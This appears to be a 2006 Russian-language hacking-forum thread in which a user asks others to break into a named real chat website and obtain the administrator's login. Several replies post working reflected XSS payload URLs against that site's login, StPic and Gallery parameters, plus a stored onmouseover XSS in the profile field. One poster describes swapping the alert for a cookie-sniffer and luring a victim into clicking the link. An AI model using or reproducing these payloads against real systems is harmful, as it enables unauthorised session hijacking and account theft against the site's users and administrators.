Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Помогите взломать !!!! (https://forum.antichat.xyz/showthread.php?t=24879)

kord 04.10.2006 19:28

Помогите взломать !!!!
 
http://chat.russianamerica.com:8080/ помогите узнать логин админа и код с уважением Автоматический гранатамёт Стечкина.

Sn@k3 04.10.2006 21:06

Не нравиц мне та надпись Russian Amerika, будет время помогу!!!!!

kord 04.10.2006 22:45

помоги чем можешь.

nc.STRIEM 04.10.2006 23:36

первое че брасаеться в глаза это пасив на главной странице


Код:

http://chat.russianamerica.com:8080/login?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
ток пробел над убрать в document.cookie
буду смотреть дальше...

-- в профиле не фильтруються двойные кавычки

Kaban 04.10.2006 23:54

вот и я нашел
http://chat.russianamerica.com:8080/StPic?n='><script>alert(/Kaban/)</script>
XSS эта вроде работает, только когда под ником сидишь

nc.STRIEM 05.10.2006 00:05

Цитата:

Сообщение от Kaban
вот и я нашел
http://chat.russianamerica.com:8080/StPic?n='><script>alert(/Kaban/)</script>
XSS эта вроде работает, только когда под ником сидишь

ну вот те пожалуст!
осталось заместо алерта подставить скрипт для сниффера и впарить комут ссылку! уже проверил работает!

Kaban 05.10.2006 00:11

вроде тоже проходит
http://chat.russianamerica.com:8080/Gallery?s=%22%3E%3Cscript%3Ealert(/Kaban/)%3C/script%3E

nc.STRIEM 05.10.2006 00:39

Еще нашол в профиле полуактивную xss в поле Домашняя страничка: вставляеш
Код:

" onmouseover=javascript:alert(document.cookie) "
при наведение срабатывает

kord 05.10.2006 08:56

Хакеры а что именно открываеться что то я не пойму что можно с этим делать и что логин и пароль админа не узнать?

Kaban 05.10.2006 10:19

вот в этой статье всё прекрасно описано что делать, как делать и зачем делать.
http://forum.antichat.ru/thread20140.html


Время: 06:34